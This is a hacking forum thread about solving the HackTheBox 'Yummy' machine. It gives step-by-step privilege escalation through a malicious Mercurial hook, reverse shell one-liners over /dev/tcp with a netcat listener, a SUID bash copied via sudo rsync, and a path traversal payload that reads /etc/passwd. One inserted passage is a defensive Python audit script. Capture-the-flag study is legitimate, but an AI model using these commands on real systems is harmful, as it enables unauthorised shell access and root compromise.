HTB Yummy Linux
by Computerlab - Saturday October 5, 2024 at 04:27 PM
#51
(10-06-2024, 04:08 AM)hackemall Wrote: ROOT ROOT ROOT ROOT
Check sudo privileges:
Perform the following steps to escalate privileges:

    cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc

Add the reverse shell script as the last lines in /tmp/.hg/hgrc:

    [hooks]
    post-pull = /tmp/revshell.sh

Execute:

    chmod +x /tmp/revshell.sh
    sudo -u dev /usr/bin/hg pull /home/dev/app-production/

Once you have dev privileges:

Command:

    $ cd /home/dev/
    $ cp /bin/bash app-production/bash
    $ chmod u+s app-production/bash
    $ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
    $ /opt/app/bash -p

You now have root access.
You deserve reputation.

What's inside the revshell.sh file?
#52
    echo "#!/bin/bash" > /tmp/revshell.sh
    echo "/bin/bash -i >/dev/tcp/10.10.x.x/4444 0<&1 2>&1" >> /tmp/revshell.sh
    chmod +x /tmp/revshell.sh
#53
    set +H
    echo "#!/bin/bash" > /tmp/revshell.sh
    echo "/bin/bash -i >/dev/tcp/10.10.x.x/4444 0<&1 2>&1" >> /tmp/revshell.sh
    chmod +x /tmp/revshell.sh
    set -H
    sudo -u dev /usr/bin/hg pull /home/dev/app-production/
#54
(10-06-2024, 04:10 AM)gfttjdb Wrote:
What's inside the revshell.sh file?

    #!/bin/bash
    bash -c "bash -i >& /dev/tcp/10.10.14.2/11111 0>&1"

But with your IP and port.
#55
    sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/

Doing this asks for dev's password; how do we get that?
#56
Yes, you have to get a shell as dev first.

This gets you to dev:

    echo "#!/bin/bash" > /tmp/revshell.sh
    echo "/bin/bash -i >/dev/tcp/10.10.x.x/4444 0<&1 2>&1" >> /tmp/revshell.sh
    chmod +x /tmp/revshell.sh
    nc -lvnp 4444

This is the trigger:

    sudo -u dev /usr/bin/hg pull /home/dev/app-production/
#57
I would like to learn more about this set of commands; any reference link?
#58
Then this makes you root:

    cp /bin/bash /home/dev/app-production/bash
    chmod u+s /home/dev/app-production/bash
    sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
    /opt/app/bash -p

1. Initial Enumeration as qa User

When you were the qa user, you ran the sudo -l command, which revealed:

    User qa may run the following commands on localhost:
    (dev : dev) /usr/bin/hg pull /home/dev/app-production/

This was a critical piece of information because it told you that the qa user could execute a Mercurial (hg) command as the dev user. This opened up the possibility to execute something malicious while posing as dev.

2. Understanding hg (Mercurial) Hooks

Mercurial is a version control system similar to Git. It allows you to automate actions with "hooks"—scripts that are triggered when certain actions (like a pull or commit) occur.
Knowing this, you could use a malicious hook to execute commands as the dev user whenever you performed a hg pull. This led to the idea of creating a reverse shell script in the hg configuration that would be executed when pulling from a repository.

Privilege Escalation from dev to root

After gaining a shell as dev, you checked the sudo -l privileges for dev and found that dev could run rsync with elevated privileges:

    sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* /opt/app/

The key here was the --chown flag, which allowed you to change the ownership of files being copied. You copied a SUID-enabled version of bash to /opt/app/, which would execute as root when run.
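The two weaknesses described in this post can also be checked for from the administrator's side. The following is an added example, not code from the thread: it parses a Mercurial hgrc for hooks whose program lives in a world-writable directory, and inspects `sudo -l` rule lines for the hg and wildcard-rsync patterns above. The function names and the sample inputs are constructed for illustration.

```python
"""Added example, not from the thread: audit helpers for the two
misconfigurations explained above. Function names and sample inputs
are constructed for illustration."""
import configparser
import re
import shlex

# Directories any local user can write to; a hook command kept there is
# controlled by whoever populated the directory, not by the repo owner.
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Tools that execute repository-local hooks, so running them via sudo
# executes code chosen by whoever prepared the working directory.
HOOK_RUNNERS = ("/usr/bin/hg", "/usr/bin/git")
# rsync options that carry the source's permission bits (setuid included)
# over to the destination; -a implies -p.
PERM_PRESERVING = {"-a", "--archive", "-p", "--perms"}

def hgrc_hooks(text):
    """Return {hook: command} from the [hooks] section of an hgrc."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return dict(cp.items("hooks")) if cp.has_section("hooks") else {}

def risky_hooks(text):
    """Hooks whose program lives in a world-writable directory."""
    found = {}
    for hook, cmd in hgrc_hooks(text).items():
        argv = shlex.split(cmd)
        if argv and argv[0].startswith(WORLD_WRITABLE):
            found[hook] = argv[0]
    return found

def sudo_rule_findings(rule):
    """Findings for one rule line as printed by `sudo -l`, for example
    '(root) NOPASSWD: /usr/bin/rsync -a /home/dev/app-production/* /opt/app/'."""
    # Drop the "(runas)" prefix and tags such as NOPASSWD: or SETENV:.
    cmd = re.sub(r"^\s*(?:\([^)]*\)\s*)?(?:[A-Z_]+:\s*)*", "", rule)
    argv = shlex.split(cmd)
    findings = []
    if not argv:
        return findings
    if argv[0] in HOOK_RUNNERS:
        findings.append("runs repository hooks as the target user")
    if any("*" in arg for arg in argv[1:]):
        findings.append("wildcard lets the caller append extra options")
    if argv[0].endswith("rsync") and PERM_PRESERVING & set(argv[1:]):
        findings.append("rsync keeps setuid/setgid bits on copied files")
    return findings
```

Running both checks on the rules quoted in this thread flags the hg rule for hook execution and the rsync rule for both the wildcard and permission preservation; a rule such as `/usr/bin/systemctl restart caddy` produces no findings.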
#59
(10-05-2024, 07:34 PM)Pepperwhite Wrote: We can leak /etc/passwd using the export function. Intercept response and forward export/../../../../../../etc/passwd and we get it.

I am a bit confused on this: where to do it and how to do it?
#60
How did you guys find the admin dashboard, and from where did you get the script to get the admin JWT token? Can you please explain it to me?